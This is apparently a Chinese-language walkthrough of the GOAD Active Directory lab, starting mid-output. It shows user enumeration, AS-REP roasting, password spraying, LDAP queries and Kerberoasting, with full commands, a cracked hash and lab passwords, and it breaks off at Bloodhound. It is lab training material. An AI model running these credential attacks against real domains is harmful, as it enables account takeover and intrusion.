[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:192.168.56.11)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] NORTH
[+] Builtin
[+] Password Info for Domain: NORTH
[+] Minimum password length: 5
[+] Password history length: 24
[+] Maximum password age: 311 days 2 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 5 minutes
[+] Locked Account Duration: 5 minutes
[+] Account Lockout Threshold: 5
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 192.168.56.11 )======================================
[+] Getting builtin groups:
group:[Guests] rid:[0x222]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Users] rid:[0x221]
[+] Getting builtin group memberships:
Group: IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group: Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group: Guests' (RID: 546) has member: Couldn't lookup SIDs
Group: Remote Desktop Users' (RID: 555) has member: Couldn't lookup SIDs
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group: Users' (RID: 545) has member: Couldn't lookup SIDs
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44e]
group:[AcrossTheSea] rid:[0x455]
[+] Getting local group memberships:
Group: Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
[+] Getting domain groups:
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[DnsUpdateProxy] rid:[0x44f]
group:[Stark] rid:[0x452]
group:[Night Watch] rid:[0x453]
group:[Mormont] rid:[0x454]
[+] Getting domain group memberships:
Group: 'Mormont' (RID: 1108) has member: NORTH\jeor.mormont
Group: 'Stark' (RID: 1106) has member: NORTH\arya.stark
Group: 'Stark' (RID: 1106) has member: NORTH\eddard.stark
Group: 'Stark' (RID: 1106) has member: NORTH\catelyn.stark
Group: 'Stark' (RID: 1106) has member: NORTH\robb.stark
Group: 'Stark' (RID: 1106) has member: NORTH\sansa.stark
Group: 'Stark' (RID: 1106) has member: NORTH\brandon.stark
Group: 'Stark' (RID: 1106) has member: NORTH\rickon.stark
Group: 'Stark' (RID: 1106) has member: NORTH\hodor
Group: 'Stark' (RID: 1106) has member: NORTH\jon.snow
Group: 'Domain Guests' (RID: 514) has member: NORTH\Guest
Group: 'Domain Computers' (RID: 515) has member: NORTH\CASTELBLACK$
Group: 'Night Watch' (RID: 1107) has member: NORTH\jon.snow
Group: 'Night Watch' (RID: 1107) has member: NORTH\samwell.tarly
Group: 'Night Watch' (RID: 1107) has member: NORTH\jeor.mormont
Group: 'Domain Users' (RID: 513) has member: NORTH\Administrator
Group: 'Domain Users' (RID: 513) has member: NORTH\vagrant
Group: 'Domain Users' (RID: 513) has member: NORTH\krbtgt
Group: 'Domain Users' (RID: 513) has member: NORTH\SEVENKINGDOMS$
Group: 'Domain Users' (RID: 513) has member: NORTH\arya.stark
Group: 'Domain Users' (RID: 513) has member: NORTH\eddard.stark
Group: 'Domain Users' (RID: 513) has member: NORTH\catelyn.stark
Group: 'Domain Users' (RID: 513) has member: NORTH\robb.stark
Group: 'Domain Users' (RID: 513) has member: NORTH\sansa.stark
Group: 'Domain Users' (RID: 513) has member: NORTH\brandon.stark
Group: 'Domain Users' (RID: 513) has member: NORTH\rickon.stark
Group: 'Domain Users' (RID: 513) has member: NORTH\hodor
Group: 'Domain Users' (RID: 513) has member: NORTH\jon.snow
Group: 'Domain Users' (RID: 513) has member: NORTH\samwell.tarly
Group: 'Domain Users' (RID: 513) has member: NORTH\jeor.mormont
Group: 'Domain Users' (RID: 513) has member: NORTH\sql_svc
Group: 'Group Policy Creator Owners' (RID: 520) has member: NORTH\Administrator
==================( Users on 192.168.56.11 via RID cycling (RIDS: 500-550,1000-1050) )==================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
===============================( Getting printer info for 192.168.56.11 )===============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Mon May 12 22:41:50 2025RPC Call
我们也可以直接使用 RPC Client 来和 135 RPC 端口进行通信来获取信息,
rpcclient -U "NORTH\\" 192.168.56.11 -N
rpcclient $> enumdomusers
不过这个结果有点不全,少了一些本地账户,可以用 net 工具
net rpc group members 'Domain Users' -W 'NORTH' -I '192.168.56.11' -U '%'
字典枚举
前面直接列举的方法需要 DC 开启匿名访问,但是一般为了安全性很少有 DC 会直接开。如果没有开的话就需要我们利用土方法:枚举了。
原 WP 生成字典时用了一些社会工程学: GOAD 里面权游要素过多(不过我没看过就是了),所以使用了权游的 cast 作为字典。
不过原 WP 的字典现在好像生成不了了,就直接用扫描好的结果吧,依旧是使用 nmap 进行枚举,注意到 88 端口是 kerberos 的端口,所以这里实际上是利用 kerberos 来进行用户枚举的:
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 192.168.56.10Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-13 14:59 HKT
Nmap scan report for 192.168.56.10
Host is up (0.00085s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| [email protected]
| [email protected]
| [email protected]
| [email protected]
| [email protected]
| [email protected]
|_ [email protected]
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds用同样的方法对 essos.local 这个域的用户进行枚举,
nmap -p 88 -script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 192.168.56.12Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-13 14:56 HKT
Nmap scan report for 192.168.56.12
Host is up (0.00069s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| [email protected]
| [email protected]
| [email protected]
| [email protected]
|_ [email protected]
Nmap done: 1 IP address (1 host up) scanned in 0.36 secondsnmap 的这个枚举脚本是根据 kerberos 返回的状态码来判断用户是否存在的,所以爆破时不会增加 badpwdcount 。
获取用户凭证
AS-REP Roast
从上面的操作中我们收集到了一些有效用户,现在我们需要尝试获取用户的凭证。
首先将 north.sevenkingdoms.local 的用户保存到 users.txt 中,
sql_svc
jeor.mormont
samwell.tarly
jon.snow
hodor
rickon.stark
brandon.stark
sansa.stark
robb.stark
catelyn.stark
eddard.stark
arya.stark
krbtgt
vagrant
Guest
Administrator使用 impacket/examples 中的 GetNPUsers.py 脚本进行 [AS-REP Roast]() 攻击:
$ python GetNPUsers.py north.sevenkingdoms.local/ -no-pass -usersfile ../../users.txt
Impacket v0.13.0.dev0+20250508.104819.fde4265a - Copyright Fortra, LLC and its affiliated companies
[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:6747f2406f35b011c2bd3d5d170aa8d9$654b2ee31b5149f8d896293f1197c0996240c83c9a343692e0b38a240888d98595d714a100a824b6236dc698197d608fe3924cdda04e267bd1de83f7a5fa0467213e092643a0178bf717e84e42c16b115d72a9ddbba4a272ad64f0d6aa9cecad6c28d95b790c3309444aa4758a124b3f188ca08a1a317743b800e705e8d9159ed7c6f0068fe398d1e5d62a4e74deec1fcfe4f4f32be389ed041375741fb14bf00500400191bd815e66fafebb7baa2078bd47e12bda6d640ef35516f55bc2b4272953d867b119d5df51adeb38bb1dc4277d3fa3ead7876f610c700de8111fd54e3970e4550ed2acc8a67d3af3f002c625b0a52c3c675924df84a9335381d529f876ee5e3ae84f
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robb.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User catelyn.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User vagrant doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set这里可以看到用户 brandon.stark 是一个启用了 UF_DONT_REQUIRE_PREAUTH 属性的账户,我们成功地获取到了他的 TGT。
将 hash 保存为 brandon.stark.hash 后,我们尝试使用 hashcat 进行一个密码的爆破:
$ hashcat -m 18200 brandon.stark.hash /usr/share/wordlists/rockyou.txt
...
[email protected]:6747f2406f35b011c2bd3d5d170aa8d9$654b2ee31b5149f8d896293f1197c0996240c83c9a343692e0b38a240888d98595d714a100a824b6236dc698197d608fe3924cdda04e267bd1de83f7a5fa0467213e092643a0178bf717e84e42c16b115d72a9ddbba4a272ad64f0d6aa9cecad6c28d95b790c3309444aa4758a124b3f188ca08a1a317743b800e705e8d9159ed7c6f0068fe398d1e5d62a4e74deec1fcfe4f4f32be389ed041375741fb14bf00500400191bd815e66fafebb7baa2078bd47e12bda6d640ef35516f55bc2b4272953d867b119d5df51adeb38bb1dc4277d3fa3ead7876f610c700de8111fd54e3970e4550ed2acc8a67d3af3f002c625b0a52c3c675924df84a9335381d529f876ee5e3ae84f:iseedeadpeople
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: [email protected]
Time.Started.....: Mon May 19 16:07:13 2025 (0 secs)
Time.Estimated...: Mon May 19 16:07:13 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4234.4 kH/s (1.44ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 65536/14344385 (0.46%)
Rejected.........: 0/65536 (0.00%)
Restore.Point....: 49152/14344385 (0.34%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: truckin -> sabrina7由此可知该用户的密码为 iseedeadpeople 。
Password Spray
现在我们尝试一下使用密码爆破的方式来得到一些用户凭据,(但是我觉得实战中最好还是少用,爆破行为很容易被检测出来,并且容易把机子上的账号给封了)
$ crackmapexec smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\sql_svc:sql_svc STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\jeor.mormont:jeor.mormont STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\samwell.tarly:samwell.tarly STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\jon.snow:jon.snow STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\hodor:hodor其中 --no-bruteforce 选项代表对 user 字典和 password 字典 fuzz 时是一对一的,不会进行交叉乘积。
根据上面内容,我们成功获取到了三个凭证:
- samwell.tarly:Heartsbane (用户描述)
- brandon.stark:iseedeadpeople (AS-REP Roasting)
- hodor:hodor (Password Spary)
进一步的用户枚举
在上一节中,我们成功获取到了一些可用的凭证。所以我们能够进入域中来查询所有的用户。
$ GetADUsers.py -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople
Impacket v0.13.0.dev0+20250508.104819.fde4265a - Copyright Fortra, LLC and its affiliated companies
[*] Querying north.sevenkingdoms.local for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2025-05-11 16:12:59.940640 2025-05-11 18:05:54.579884
Guest <never> <never>
vagrant 2021-05-12 19:38:55.922520 2025-05-11 19:08:06.996280
krbtgt 2025-05-11 16:42:39.983116 <never>
2025-05-11 16:52:40.599707 <never>
arya.stark 2025-05-11 17:08:02.241031 <never>
eddard.stark 2025-05-11 17:08:09.177013 2025-05-19 22:45:16.126595
catelyn.stark 2025-05-11 17:08:14.722538 <never>
robb.stark 2025-05-11 17:08:19.614742 2025-05-19 22:48:46.934108
sansa.stark 2025-05-11 17:08:24.136167 <never>
brandon.stark 2025-05-11 17:08:29.726649 2025-05-19 22:43:16.366471
rickon.stark 2025-05-11 17:08:35.360818 <never>
hodor 2025-05-11 17:08:40.385286 2025-05-19 22:43:51.403368
jon.snow 2025-05-11 17:08:45.268181 <never>
samwell.tarly 2025-05-11 17:08:52.140103 <never>
jeor.mormont 2025-05-11 17:08:56.230651 <never>
sql_svc 2025-05-11 17:09:01.025301 2025-05-11 18:25:14.985051除了使用 Impacket,我们也可以手动编写 LDAP 查询语句:
$ ldapsearch -H ldap://192.168.56.11 -D "[email protected]" -w iseedeadpeople -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" |grep 'distinguishedName:'
distinguishedName: CN=Administrator,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=Guest,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=vagrant,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=krbtgt,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=SEVENKINGDOMS$,CN=Users,DC=north,DC=sevenkingdoms,DC=loc
distinguishedName: CN=arya.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=eddard.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=catelyn.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=robb.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=sansa.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=brandon.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=rickon.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=hodor,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=jon.snow,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=samwell.tarly,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=jeor.mormont,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=sql_svc,CN=Users,DC=north,DC=sevenkingdoms,DC=local由于域信任体系的存在,我们可以通过 north.sevenkingdoms.local 域上的用户来枚举其他域的用户,比如说 sevenkingdoms.local。
$ ldapsearch -H ldap://192.168.56.10 -D "[email protected]" -w iseedeadpeople -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" | grep cn
cn: Administrator
cn: Guest
cn: vagrant
cn: krbtgt
cn: NORTH$
cn: ESSOS$
cn: tywin.lannister
cn: jaime.lannister
cn: cersei.lannister
cn: tyron.lannister
cn: robert.baratheon
cn: joffrey.baratheon
cn: renly.baratheon
cn: stannis.baratheon
cn: petyer.baelish
cn: lord.varys
cn: maester.pycelleKerberoasting
到这一步也可以尝试使用 Kerberoasting 攻击,首先查找 SPN 账户并获取 Ticket:
$ GetUserSPNs.py -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes
Impacket 会将对应的 Ticket 保存到 kerberoasting.hashes 文件中,然后我们使用 hashcat 来进行一个爆破:
$ hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt --force
我们得到 jon.snow 账户的密码为 iknownothing。
使用 Bloodhound
由于 bloodhound 工具不支持 hosts 文件里的解析
Ref.
- https://xz.aliyun.com/news/11583
- https://mayfly277.github.io/posts/GOADv2-pwning_part1/